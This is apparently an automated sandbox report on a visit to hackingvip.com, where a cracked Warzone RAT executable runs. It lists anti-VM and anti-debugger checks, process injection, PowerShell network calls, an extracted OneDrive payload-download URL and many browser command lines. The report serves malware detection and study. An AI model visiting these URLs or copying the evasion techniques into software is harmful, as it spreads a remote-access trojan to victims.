Analysis
- max time kernel: 247s
- max time network: 250s
- platform: windows10-ltsc 2021_x64
- resource: win10ltsc2021-20250128-en
- resource tags: arch:x64, arch:x86, image:win10ltsc2021-20250128-en, locale:en-us, os:windows10-ltsc 2021-x64, system
- submitted: 31/01/2025, 14:36
Tasks
- Static task: static1
- URLScan task: urlscan1
- Behavioral task: behavioral1
Sample: http://hackingvip.com
Resource: win10ltsc2021-20250128-en
General
- Target: http://hackingvip.com
Malware Config
- Extracted: https://onedrive.live.com/download?cid=C7F050ABA6D0F6B7&resid=C7F050ABA6D0F6B7%21105&authkey=AIPYamsd38clFVs
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)
description | pid | Process | procid_target
PID 3864 created 3668 | 3864 | WARZONE-RAT 3.03 Cracked.exe | 57
PID 2536 created 3668 | 2536 | WARZONE-RAT 3.03 Cracked.exe | 57
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
Warzonerat family
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | WARZONE-RAT 3.03 Cracked.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | WARZONE RAT 3.03 Cracked.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | WARZONE-RAT 3.03 Cracked.exe
Warzone RAT payload (1 IoCs)
resource | yara_rule
behavioral1/files/0x0007000000027ea6-612.dat | warzonerat
Blocklisted process makes network request (6 IoCs)
flow | pid | Process
159 | 3264 | powershell.exe
161 | 3264 | powershell.exe
164 | 3264 | powershell.exe
172 | 2076 | powershell.exe
173 | 2076 | powershell.exe
175 | 2076 | powershell.exe
Checks BIOS information in registry (2 TTPs, 6 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | WARZONE-RAT 3.03 Cracked.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | WARZONE-RAT 3.03 Cracked.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | WARZONE-RAT 3.03 Cracked.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | WARZONE RAT 3.03 Cracked.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | WARZONE RAT 3.03 Cracked.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | WARZONE-RAT 3.03 Cracked.exe
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3933156042-2316999077-2687276773-1000\Control Panel\International\Geo\Nation | WARZONE-RAT 3.03 Cracked.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3933156042-2316999077-2687276773-1000\Control Panel\International\Geo\Nation | WARZONE-RAT 3.03 Cracked.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3933156042-2316999077-2687276773-1000\Control Panel\International\Geo\Nation | WARZONE-RAT 3.03 Cracked.exe
Executes dropped EXE (5 IoCs)
pid | Process
3864 | WARZONE-RAT 3.03 Cracked.exe
5104 | WARZONE-RAT 3.03 Cracked.exe
3596 | WARZONE RAT 3.03 Cracked.exe
2536 | WARZONE-RAT 3.03 Cracked.exe
1264 | WARZONE-RAT 3.03 Cracked.exe
Loads dropped DLL (4 IoCs)
pid | Process
3596 | WARZONE RAT 3.03 Cracked.exe
3596 | WARZONE RAT 3.03 Cracked.exe
3596 | WARZONE RAT 3.03 Cracked.exe
3596 | WARZONE RAT 3.03 Cracked.exe
resource | yara_rule
behavioral1/files/0x0007000000027ea8-503.dat | themida
behavioral1/memory/3864-507-0x0000000000E50000-0x0000000002392000-memory.dmp | themida
behavioral1/memory/3864-508-0x0000000000E50000-0x0000000002392000-memory.dmp | themida
behavioral1/files/0x0007000000027ead-524.dat | themida
behavioral1/memory/3596-604-0x0000000000400000-0x0000000001411000-memory.dmp | themida
behavioral1/memory/3864-605-0x0000000000E50000-0x0000000002392000-memory.dmp | themida
behavioral1/memory/3596-608-0x0000000000400000-0x0000000001411000-memory.dmp | themida
behavioral1/memory/3596-607-0x0000000000400000-0x0000000001411000-memory.dmp | themida
behavioral1/memory/3596-609-0x0000000000400000-0x0000000001411000-memory.dmp | themida
behavioral1/memory/3596-614-0x0000000000400000-0x0000000001411000-memory.dmp | themida
behavioral1/memory/5104-632-0x0000000000E50000-0x0000000002392000-memory.dmp | themida
behavioral1/memory/3596-657-0x0000000000400000-0x0000000001411000-memory.dmp | themida
behavioral1/memory/2536-663-0x0000000000E50000-0x0000000002392000-memory.dmp | themida
behavioral1/memory/2536-664-0x0000000000E50000-0x0000000002392000-memory.dmp | themida
behavioral1/memory/2536-669-0x0000000000E50000-0x0000000002392000-memory.dmp | themida
Checks whether UAC is enabled (1 TTPs, 3 IoCs)
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | WARZONE RAT 3.03 Cracked.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | WARZONE-RAT 3.03 Cracked.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | WARZONE-RAT 3.03 Cracked.exe
Looks up external IP address via web service (6 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
163 | icanhazip.com
164 | icanhazip.com
175 | icanhazip.com
192 | whatismyipaddress.com
193 | whatismyipaddress.com
194 | whatismyipaddress.com
Suspicious use of NtSetInformationThreadHideFromDebugger (9 IoCs)
pid | Process
3864 | WARZONE-RAT 3.03 Cracked.exe
5104 | WARZONE-RAT 3.03 Cracked.exe
5104 | WARZONE-RAT 3.03 Cracked.exe
3596 | WARZONE RAT 3.03 Cracked.exe
5104 | WARZONE-RAT 3.03 Cracked.exe
2536 | WARZONE-RAT 3.03 Cracked.exe
1264 | WARZONE-RAT 3.03 Cracked.exe
1264 | WARZONE-RAT 3.03 Cracked.exe
1264 | WARZONE-RAT 3.03 Cracked.exe
Suspicious use of SetThreadContext (2 IoCs)
description | pid | Process | procid_target
PID 3864 set thread context of 5104 | 3864 | WARZONE-RAT 3.03 Cracked.exe | 120
PID 2536 set thread context of 1264 | 2536 | WARZONE-RAT 3.03 Cracked.exe | 129
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WARZONE RAT 3.03 Cracked.exe
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Modifies registry class (2 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | WARZONE-RAT 3.03 Cracked.exe
Key created | \REGISTRY\USER\S-1-5-21-3933156042-2316999077-2687276773-1000_Classes\Local Settings | msedge.exe
Opens file in notepad (likely ransom note) (1 IoCs)
pid | Process
4344 | NOTEPAD.EXE
Suspicious behavior: EnumeratesProcesses (32 IoCs)
pid | Process | entries
3360 | msedge.exe | 2
1236 | msedge.exe | 2
524 | identity_helper.exe | 2
2340 | msedge.exe | 2
3544 | msedge.exe | 4
5104 | WARZONE-RAT 3.03 Cracked.exe | 2
3264 | powershell.exe | 3
1264 | WARZONE-RAT 3.03 Cracked.exe | 2
2076 | powershell.exe | 3
3824 | taskmgr.exe | 10
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (23 IoCs)
pid | Process | entries
1236 | msedge.exe | 23
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: 33 | 2896 | AUDIODG.EXE
Token: SeIncBasePriorityPrivilege | 2896 | AUDIODG.EXE
Token: SeRestorePrivilege | 4356 | 7zG.exe
Token: 35 | 4356 | 7zG.exe
Token: SeSecurityPrivilege | 4356 | 7zG.exe
Token: SeSecurityPrivilege | 4356 | 7zG.exe
Token: SeRestorePrivilege | 2480 | 7zG.exe
Token: 35 | 2480 | 7zG.exe
Token: SeSecurityPrivilege | 2480 | 7zG.exe
Token: SeSecurityPrivilege | 2480 | 7zG.exe
Token: SeDebugPrivilege | 3264 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3264 | powershell.exe
Token: SeSecurityPrivilege | 3264 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3264 | powershell.exe
Token: SeLoadDriverPrivilege | 3264 | powershell.exe
Token: SeSystemProfilePrivilege | 3264 | powershell.exe
Token: SeSystemtimePrivilege | 3264 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3264 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3264 | powershell.exe
Token: SeCreatePagefilePrivilege | 3264 | powershell.exe
Token: SeBackupPrivilege | 3264 | powershell.exe
Token: SeRestorePrivilege | 3264 | powershell.exe
Token: SeShutdownPrivilege | 3264 | powershell.exe
Token: SeDebugPrivilege | 3264 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3264 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3264 | powershell.exe
Token: SeUndockPrivilege | 3264 | powershell.exe
Token: SeManageVolumePrivilege | 3264 | powershell.exe
Token: 33 | 3264 | powershell.exe
Token: 34 | 3264 | powershell.exe
Token: 35 | 3264 | powershell.exe
Token: 36 | 3264 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3264 | powershell.exe
Token: SeSecurityPrivilege | 3264 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3264 | powershell.exe
Token: SeLoadDriverPrivilege | 3264 | powershell.exe
Token: SeSystemProfilePrivilege | 3264 | powershell.exe
Token: SeSystemtimePrivilege | 3264 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3264 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3264 | powershell.exe
Token: SeCreatePagefilePrivilege | 3264 | powershell.exe
Token: SeBackupPrivilege | 3264 | powershell.exe
Token: SeRestorePrivilege | 3264 | powershell.exe
Token: SeShutdownPrivilege | 3264 | powershell.exe
Token: SeDebugPrivilege | 3264 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3264 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3264 | powershell.exe
Token: SeUndockPrivilege | 3264 | powershell.exe
Token: SeManageVolumePrivilege | 3264 | powershell.exe
Token: 33 | 3264 | powershell.exe
Token: 34 | 3264 | powershell.exe
Token: 35 | 3264 | powershell.exe
Token: 36 | 3264 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3264 | powershell.exe
Token: SeSecurityPrivilege | 3264 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3264 | powershell.exe
Token: SeLoadDriverPrivilege | 3264 | powershell.exe
Token: SeSystemProfilePrivilege | 3264 | powershell.exe
Token: SeSystemtimePrivilege | 3264 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3264 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3264 | powershell.exe
Token: SeCreatePagefilePrivilege | 3264 | powershell.exe
Token: SeBackupPrivilege | 3264 | powershell.exe
Token: SeRestorePrivilege | 3264 | powershell.exe
Suspicious use of FindShellTrayWindow (64 IoCs)
pid | Process
1236 | msedge.exe (repeated)
4356 | 7zG.exe
2480 | 7zG.exe
3824 | taskmgr.exe (repeated)
(64 entries in total; the msedge.exe and taskmgr.exe rows recur many times in the report)
Suspicious use of SendNotifyMessage (64 IoCs)
pid | Process
1236 | msedge.exe (repeated)
3824 | taskmgr.exe (repeated)
(64 entries in total, all attributed to these two processes)
Suspicious use of SetWindowsHookEx (3 IoCs)
pid | Process
5104 | WARZONE-RAT 3.03 Cracked.exe
3596 | WARZONE RAT 3.03 Cracked.exe
1264 | WARZONE-RAT 3.03 Cracked.exe
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 1236 wrote to memory of 2044 | 1236 | msedge.exe | 83
PID 1236 wrote to memory of 1948 | 1236 | msedge.exe | 84
PID 1236 wrote to memory of 3360 | 1236 | msedge.exe | 85
PID 1236 wrote to memory of 216 | 1236 | msedge.exe | 86
(64 entries in total; the writes to 1948 and 216 in particular are repeated many times)
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
- Explorer.EXE (PID 3668)
  Path: C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  - msedge.exe (PID 1236)
    Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://hackingvip.com
    Signatures:
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    - msedge.exe (PID 2044)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffa12db46f8,0x7ffa12db4708,0x7ffa12db4718
    - msedge.exe (PID 1948)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
    - msedge.exe (PID 3360)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
    - msedge.exe (PID 216)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8
    - msedge.exe (PID 5024)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
    - msedge.exe (PID 1840)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
    - identity_helper.exe (PID 1560)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:8
    - identity_helper.exe (PID 524)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:8
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
    - msedge.exe (PID 1696)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1976 /prefetch:8
    - msedge.exe (PID 1616)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
    - msedge.exe (PID 2876)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1804 /prefetch:1
    - msedge.exe (PID 564)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
    - msedge.exe (PID 4484)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1
    - msedge.exe (PID 3624)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4236 /prefetch:1
    - msedge.exe (PID 1688)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1
    - msedge.exe (PID 3596)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
    - msedge.exe (PID 3240)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4248 /prefetch:8
    - msedge.exe (PID 4388)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:1
    - msedge.exe (PID 2340)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6908 /prefetch:8
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
    - msedge.exe (PID 3544)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6212 /prefetch:2
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
    - msedge.exe (PID 4616)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
    - msedge.exe (PID 2776)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
    - msedge.exe (PID 1704)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7244 /prefetch:1
    - msedge.exe (PID 2120)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
    - msedge.exe (PID 4528)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:1
    - msedge.exe (PID 3548)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7100 /prefetch:1
    - msedge.exe (PID 3660)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
    - msedge.exe (PID 2060)
      Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=936 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7432 /prefetch:13⤵PID:392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:13⤵PID:4576
